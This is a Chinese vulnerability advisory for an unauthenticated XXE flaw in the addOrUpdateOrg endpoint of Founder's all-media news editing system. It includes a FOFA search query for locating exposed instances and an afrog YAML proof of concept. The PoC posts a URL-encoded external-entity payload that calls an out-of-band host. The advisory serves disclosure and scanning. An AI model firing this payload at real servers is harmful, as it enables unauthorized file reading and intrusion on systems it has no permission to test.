方正畅享全媒体新闻采编系统addOrUpdateOrg存在XXE漏洞

漏洞信息

漏洞名称： 方正畅享全媒体新闻采编系统addOrUpdateOrg存在XXE漏洞

漏洞类型： XML实体注入

漏洞等级： 严重

漏洞描述： 方正畅享全媒体新闻采编系统是一款专为新闻媒体机构设计的采编管理软件，广泛应用于新闻出版、广播电视等行业，用于新闻内容的采集、编辑、发布等全流程管理。该系统通过集中化管理新闻资源，提高了新闻采编的效率和协作能力。然而，该系统中的一个接口addOrUpdateOrg存在XML外部实体注入（XXE）漏洞。该漏洞的根源在于系统在处理XML请求时，未对用户提交的XML数据进行严格的实体解析限制，导致攻击者可以通过构造恶意的XML实体，引用外部实体，进而读取服务器上的敏感文件。由于该漏洞无需身份认证即可利用，攻击者可以远程发起攻击，读取系统内部文件，如配置文件、密码文件等，获取敏感信息，严重威胁系统的安全性。此漏洞的存在使得系统处于极不安全的状态，可能导致数据泄露、服务中断等严重后果。

产品厂商： 方正

产品名称： 方正畅享全媒体新闻采编系统

搜索语法： app=”FOUNDER-全媒体采编系统”

来源： https://github.com/zan8in/afrog/blob/89bfabcff982e1109bcaa6ece0d23f5105497a67/pocs%2Fafrog-pocs%2Fvulnerability%2Ffounder-add-or-update-org-xxe.yaml

类型： zan8in/afrog:github commit

POC详情

id: founder-add-or-update-org-xxe

info:
  name: 方正畅享全媒体新闻采编系统addOrUpdateOrg存在XXE漏洞
  author: zan8in
  severity: critical
  verified: false
  description: |-
    方正畅享全媒体新闻采编系统addOrUpdateOrg存在XXE漏洞，未经身份认证的攻击者可以利用此漏洞读取系统内部敏感文件，获取敏感信息，使系统处于极不安全的状态。
    fofa: app="FOUNDER-全媒体采编系统"
  tags: xxe,方正,方正畅享全媒体采编系统
  created: 2025/03/10

set:
  oob: oob()
  oobHTTP: oob.HTTP
rules:
  r0:
    request:
      method: POST
      path: /newsedit/api/orgUser/addOrUpdateOrg
      body: |
        xmlStr=%3C!DOCTYPE%20root%20%5B%20%3C!ENTITY%20%25%20remote%20SYSTEM%20%22{{oobHTTP}}%22%3E%20%25remote;%5D%3E
    expression: response.status == 200 && oobCheck(oob, oob.ProtocolHTTP, 3)
expression: r0()